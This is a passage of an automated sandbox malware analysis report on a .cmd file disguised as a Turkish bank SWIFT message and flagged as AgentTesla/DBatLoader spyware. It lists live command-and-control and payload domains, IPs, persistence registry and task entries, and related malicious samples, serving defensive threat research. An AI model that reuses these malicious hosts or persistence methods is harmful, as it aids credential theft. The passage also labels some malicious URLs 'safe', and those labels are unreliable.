https://gxe0.com/yak/233_Wisrysxlfssexell	0%	Avira URL Cloud	safe
http://yadelphi.ru	0%	Avira URL Cloud	safe
https://gxe0.com/yak/233_Wisrysxlfss	0%	Avira URL Cloud	safe
https://gxe0.com:443/yak/233_Wisrysxlfss	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
gxe0.com	198.252.105.91	true	false	high
api.ipify.org	104.26.12.205	true	false	high
s82.gocheapweb.com	51.195.88.199	true	false	high
pywolwnvd.biz	54.244.188.177	true	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.ipify.org/	false		high
https://gxe0.com/yak/233_Wisrysxlfss	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0	x.exe, 00000004.00000003.2141221993.000000007E137000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2241429521.000000007F007000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2142185552.000000007FB10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2141221993.000000007E0B0000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000001790000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp	false		high
http://nuget.org/NuGet.exe	powershell.exe, 0000000D.00000002.2269568363.000000000584A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://gxe0.com/yak/233_Wisrysx	x.exe, 00000004.00000002.2220018454.00000000208FD000.00000004.00001000.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://sectigo.com/CPS0	x.exe, 00000004.00000003.2141221993.000000007E137000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2241429521.000000007F007000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2142185552.000000007FB10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2141221993.000000007E0B0000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000001790000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp	false		high
https://account.dyn.com/	neworigin.exe, 0000000B.00000000.2176656166.0000000000542000.00000002.00000001.01000000.00000009.sdmp	false		high
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	x.exe, 00000004.00000003.2141221993.000000007E137000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2241429521.000000007F007000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2142185552.000000007FB10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2141221993.000000007E0B0000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000001790000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp	false		high
http://ocsp.sectigo.com0	x.exe, 00000004.00000003.2141221993.000000007E137000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2241429521.000000007F007000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2142185552.000000007FB10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2141221993.000000007E0B0000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000001790000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000000D.00000002.2257244398.0000000004935000.00000004.00000800.00020000.00000000.sdmp	false		high
http://r11.o.lencr.org0#	neworigin.exe, 0000000B.00000002.2310705536.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000B.00000002.2337075849.00000000029F3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000B.00000002.2337075849.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000B.00000002.2357786292.0000000006061000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000B.00000002.2310705536.0000000000C8A000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2395156851.0000000000990000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2395156851.0000000000926000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2422352208.0000000002704000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2445989296.0000000005F52000.00000004.00000020.00020000.00000000.sdmp	false		high
http://yadelphi.ruopen	x.exe, 00000004.00000000.2059921926.0000000000401000.00000020.00000001.01000000.00000004.sdmp, x.exe, 00000004.00000002.2251749179.000000007F920000.00000004.00001000.00020000.00000000.sdmp, esentutl.exe, 00000008.00000003.2171156522.0000000005600000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000002310000.00000040.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://gxe0.com/yak/233_WisrysxlfssC	x.exe, 00000004.00000002.2176035692.000000000088E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 0000000D.00000002.2257244398.0000000004935000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000000D.00000002.2257244398.0000000004935000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#	x.exe, 00000004.00000003.2141221993.000000007E137000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2241429521.000000007F007000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2142185552.000000007FB10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2141221993.000000007E0B0000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000001790000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 0000000D.00000002.2269568363.000000000584A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 0000000D.00000002.2269568363.000000000584A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	x.exe, 00000004.00000003.2141221993.000000007E137000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2241429521.000000007F007000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2142185552.000000007FB10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2141221993.000000007E0B0000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000001790000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp	false		high
https://api.ipify.org/t	neworigin.exe, 0000000B.00000002.2337075849.0000000002971000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2422352208.000000000268C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 0000000D.00000002.2257244398.0000000004935000.00000004.00000800.00020000.00000000.sdmp	false		high
https://gxe0.com/	x.exe, 00000004.00000002.2176035692.00000000008FB000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://r11.i.lencr.org/0	neworigin.exe, 0000000B.00000002.2310705536.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000B.00000002.2337075849.00000000029F3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000B.00000002.2337075849.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000B.00000002.2357786292.0000000006061000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000B.00000002.2310705536.0000000000C8A000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2395156851.0000000000990000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2395156851.0000000000926000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2422352208.0000000002704000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2445989296.0000000005F52000.00000004.00000020.00020000.00000000.sdmp	false		high
https://gxe0.com/yak/233_Wisrysxlfssexell	x.exe, 00000004.00000002.2176035692.00000000008D8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.ipify.org	neworigin.exe, 0000000B.00000000.2176656166.0000000000542000.00000002.00000001.01000000.00000009.sdmp, neworigin.exe, 0000000B.00000002.2337075849.0000000002971000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2422352208.000000000268C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/pscore6lB	powershell.exe, 0000000D.00000002.2257244398.00000000047E1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.c.lencr.org/0	neworigin.exe, 0000000B.00000002.2337075849.00000000029F3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000B.00000002.2337075849.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000B.00000002.2357786292.0000000006061000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000B.00000002.2310705536.0000000000C8A000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2395156851.0000000000990000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2395156851.00000000009B8000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2395156851.0000000000926000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2422352208.0000000002704000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	neworigin.exe, 0000000B.00000002.2337075849.00000000029F3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000B.00000002.2337075849.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000B.00000002.2357786292.0000000006061000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000B.00000002.2310705536.0000000000C8A000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2395156851.0000000000990000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2395156851.00000000009B8000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2395156851.0000000000926000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2422352208.0000000002704000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 0000000D.00000002.2257244398.0000000004935000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 0000000D.00000002.2269568363.000000000584A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 0000000D.00000002.2269568363.000000000584A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://s82.gocheapweb.com	neworigin.exe, 0000000B.00000002.2337075849.00000000029E9000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000B.00000002.2337075849.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2422352208.00000000026FC000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2422352208.0000000002891000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://gxe0.com:443/yak/233_Wisrysxlfss	x.exe, 00000004.00000002.2176035692.0000000000903000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://yadelphi.ru	x.exe, 00000004.00000000.2059921926.0000000000401000.00000020.00000001.01000000.00000004.sdmp, x.exe, 00000004.00000002.2251749179.000000007F920000.00000004.00001000.00020000.00000000.sdmp, esentutl.exe, 00000008.00000003.2171156522.0000000005600000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000002310000.00000040.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	neworigin.exe, 0000000B.00000002.2337075849.0000000002971000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2257244398.00000000047E1000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2422352208.000000000268C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.pmail.com	x.exe, x.exe, 00000004.00000003.2063002452.000000007FAE0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2185356044.0000000002985000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.2062442463.0000000002990000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220018454.0000000020874000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2234539521.0000000021C30000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2253826982.000000007FCEF000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2176035692.000000000095A000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2235162223.0000000021E2F000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220018454.00000000207F3000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 0000000A.00000000.2172730384.0000000000416000.00000002.00000001.01000000.00000007.sdmp, Wisrysxl.PIF, 00000018.00000002.2312849494.0000000002BD2000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000002440000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000000.2295133769.0000000000416000.00000002.00000001.01000000.00000007.sdmp, Wisrysxl.PIF, 0000001C.00000002.2394647640.0000000002A62000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000002440000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000000.2376277495.0000000000416000.00000002.00000001.01000000.00000007.sdmp	false		high
http://ocsp.sectigo.com0C	x.exe, 00000004.00000003.2141221993.000000007E137000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2241429521.000000007F007000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2142185552.000000007FB10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2141221993.000000007E0B0000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000001790000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.26.12.205	api.ipify.org	United States	13335	CLOUDFLARENETUS	false
198.252.105.91	gxe0.com	Canada	20068	HAWKHOSTCA	false
51.195.88.199	s82.gocheapweb.com	France	16276	OVHFR	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1555251
Start date and time:	2024-11-13 16:27:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 13m 23s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	34
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd
Detection:	MAL
Classification:	mal100.spre.troj.spyw.evad.winCMD@52/25@5/3
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 98% Number of executed functions: 277 Number of non-executed functions: 52
Cookbook Comments:	Found application associated with file extension: .cmd Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target TrojanAIbot.exe, PID 2164 because it is empty
Execution Graph export aborted for target powershell.exe, PID 5792 because it is empty
Execution Graph export aborted for target server_BTC.exe, PID 2820 because it is empty
Execution Graph export aborted for target server_BTC.exe, PID 7580 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd

Simulations

Behavior and APIs

Time	Type	Description
10:28:00	API Interceptor	2x Sleep call for process: x.exe modified
10:28:16	API Interceptor	15x Sleep call for process: powershell.exe modified
10:28:16	API Interceptor	7581300x Sleep call for process: neworigin.exe modified
10:28:18	API Interceptor	3477293x Sleep call for process: TrojanAIbot.exe modified
10:28:22	API Interceptor	2x Sleep call for process: Wisrysxl.PIF modified
16:28:13	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Wisrysxl C:\Users\Public\Wisrysxl.url
16:28:16	Task Scheduler	Run new task: AccSys path: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
16:28:22	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Wisrysxl C:\Users\Public\Wisrysxl.url
16:28:30	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.26.12.205	Ransomware Mallox.exe	Get hash	malicious	Targeted Ransomware	Browse	api.ipify.org/
	Yc9hcFC1ux.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	6706e721f2c06.exe	Get hash	malicious	Remcos	Browse	api.ipify.org/
	perfcc.elf	Get hash	malicious	Xmrig	Browse	api.ipify.org/
	SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe	Get hash	malicious	RDPWrap Tool	Browse	api.ipify.org/
	SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe	Get hash	malicious	RDPWrap Tool	Browse	api.ipify.org/
	hloRQZmlfg.exe	Get hash	malicious	RDPWrap Tool	Browse	api.ipify.org/
	file.exe	Get hash	malicious	RDPWrap Tool	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
198.252.105.91	DHL-INVOICE-MBV.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.legaldanaa.com/d0ad/?jXu=gWBUvkz7Th1w/4or5wJyBYQATVQKYMhDH/gPz8FNlyuh7t8wp+tSlul7hgK6xuyfJYQ1BxvuzK7AKBkx6IgPVHnLyXh5nXmxBA==&hZ=5jUpdPs
51.195.88.199	x.exe	Get hash	malicious	AgentTesla, DBatLoader	Browse
	neworigin.exe	Get hash	malicious	AgentTesla	Browse
	TC_Ziraat_Bankasi_Hesap_Ekstresi.cmd	Get hash	malicious	AgentTesla, DBatLoader	Browse
	Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat	Get hash	malicious	AgentTesla, DBatLoader	Browse
	New_Order_PO_GM5637H93.exe	Get hash	malicious	AgentTesla, PureLog Stealer, RedLine, XWorm	Browse
	New_Order_PO_GM5637H93.cmd	Get hash	malicious	AgentTesla, DBatLoader	Browse
	AENiBH7X1q.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse
	New_Order_568330_Material_Specifications.exe	Get hash	malicious	AgentTesla, MassLogger RAT, Phoenix Stealer, RedLine, SugarDump, XWorm	Browse
	RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse
	PO-DGA77_MATERIALS_SPECIFICATIONS.scr.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
s82.gocheapweb.com	x.exe	Get hash	malicious	AgentTesla, DBatLoader	Browse	51.195.88.199
	neworigin.exe	Get hash	malicious	AgentTesla	Browse	51.195.88.199
	TC_Ziraat_Bankasi_Hesap_Ekstresi.cmd	Get hash	malicious	AgentTesla, DBatLoader	Browse	51.195.88.199
	Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat	Get hash	malicious	AgentTesla, DBatLoader	Browse	51.195.88.199
	New_Order_PO_GM5637H93.exe	Get hash	malicious	AgentTesla, PureLog Stealer, RedLine, XWorm	Browse	51.195.88.199
	New_Order_PO_GM5637H93.cmd	Get hash	malicious	AgentTesla, DBatLoader	Browse	51.195.88.199
	AENiBH7X1q.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	51.195.88.199
	New_Order_568330_Material_Specifications.exe	Get hash	malicious	AgentTesla, MassLogger RAT, Phoenix Stealer, RedLine, SugarDump, XWorm	Browse	51.195.88.199
	RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	51.195.88.199
	PO-DGA77_MATERIALS_SPECIFICATIONS.scr.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	51.195.88.199
api.ipify.org	Payload.exe	Get hash	malicious	Python Stealer, BLX Stealer, XLABB Grabber	Browse	172.67.74.152
	Payload.exe	Get hash	malicious	Python Stealer, BLX Stealer, XLABB Grabber	Browse	104.26.12.205
	https://www.canva.com/design/DAGOCNo1NUI/fm7sxEzJIeZ3v2miLpNZCw/view?utm_content=DAGOCNo1NUI&utm_campaign=designshare&utm_medium=link&utm_source=editor	Get hash	malicious	Unknown	Browse	104.26.12.205
	setup7.0.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.13.205
	DHL Delivery Invoice.com.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	fefbBqMKcU.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	172.67.74.152
	yh5At5T1Zs.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.12.205
	scan3762399_arleen@wcctxlaw.com.pdf	Get hash	malicious	Unknown	Browse	172.67.74.152
	x.exe	Get hash	malicious	AgentTesla, DBatLoader	Browse	104.26.13.205
	neworigin.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
gxe0.com	x.exe	Get hash	malicious	AgentTesla, DBatLoader	Browse	198.252.105.91
	TC_Ziraat_Bankasi_Hesap_Ekstresi.cmd	Get hash	malicious	AgentTesla, DBatLoader	Browse	198.252.105.91
	Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat	Get hash	malicious	AgentTesla, DBatLoader	Browse	198.252.105.91
	NEOMS_EOI_FORM.cmd	Get hash	malicious	DBatLoader	Browse	198.252.105.91
	NEOMS_EOI_FORM.GZ	Get hash	malicious	DBatLoader	Browse	198.252.105.91
	New_Order_PO_GM5637H93.cmd	Get hash	malicious	AgentTesla, DBatLoader	Browse	198.252.105.91
pywolwnvd.biz	x.exe	Get hash	malicious	AgentTesla, DBatLoader	Browse	54.244.188.177
	TC_Ziraat_Bankasi_Hesap_Ekstresi.cmd	Get hash	malicious	AgentTesla, DBatLoader	Browse	54.244.188.177
	Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat	Get hash	malicious	AgentTesla, DBatLoader	Browse	54.244.188.177
	AENiBH7X1q.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	54.244.188.177
	E_dekont.cmd	Get hash	malicious	DBatLoader, Nitol, PureLog Stealer, XWorm	Browse	54.244.188.177
	Y2EM7suNV5.exe	Get hash	malicious	MassLogger RAT	Browse	54.244.188.177
	AsusSetup.exe	Get hash	malicious	Unknown	Browse	54.244.188.177
	SetupRST.exe	Get hash	malicious	Unknown	Browse	54.244.188.177
	AsusSetup.exe	Get hash	malicious	Unknown	Browse	54.244.188.177
	RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	54.244.188.177

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://uxfol.io/p/b02d8c67/029f480a	Get hash	malicious	Unknown	Browse	188.114.96.3
	EXT_Transaction Details for Martibs -462fd4a1151861ecbc00b016e69e7825 (18.7 KB).msg	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://www.trendytechinsight.com/sx	Get hash	malicious	Unknown	Browse	188.114.96.3
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	172.64.41.3
	View Pdf Doc_64a1d1f34487fde7a21830b013c89f85.htm	Get hash	malicious	Unknown	Browse	104.17.25.14
	file.exe	Get hash	malicious	LummaC	Browse	172.67.150.243
	Payload.exe	Get hash	malicious	Python Stealer, BLX Stealer, XLABB Grabber	Browse	172.67.74.152
	aba5298f.msi	Get hash	malicious	Unknown	Browse	104.18.86.42
	FW Cardenas Leslie shared Mathis IDS Remittance Copy with you.msg	Get hash	malicious	Unknown	Browse	104.18.11.207
	Payload.exe	Get hash	malicious	Python Stealer, BLX Stealer, XLABB Grabber	Browse	104.26.12.205
HAWKHOSTCA	x.exe	Get hash	malicious	AgentTesla, DBatLoader	Browse	198.252.105.91
	TC_Ziraat_Bankasi_Hesap_Ekstresi.cmd	Get hash	malicious	AgentTesla, DBatLoader	Browse	198.252.105.91
	Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat	Get hash	malicious	AgentTesla, DBatLoader	Browse	198.252.105.91
	NEOMS_EOI_FORM.cmd	Get hash	malicious	DBatLoader	Browse	198.252.105.91
	NEOMS_EOI_FORM.GZ	Get hash	malicious	DBatLoader	Browse	198.252.105.91
	New_Order_PO_GM5637H93.cmd	Get hash	malicious	AgentTesla, DBatLoader	Browse	198.252.105.91
	Shipping documents..exe	Get hash	malicious	FormBook	Browse	198.252.98.54
	SALARY OF OCT 2024.exe	Get hash	malicious	FormBook	Browse	198.252.98.54
	PURCHASE ORDER-6350.exe	Get hash	malicious	FormBook	Browse	198.252.106.191
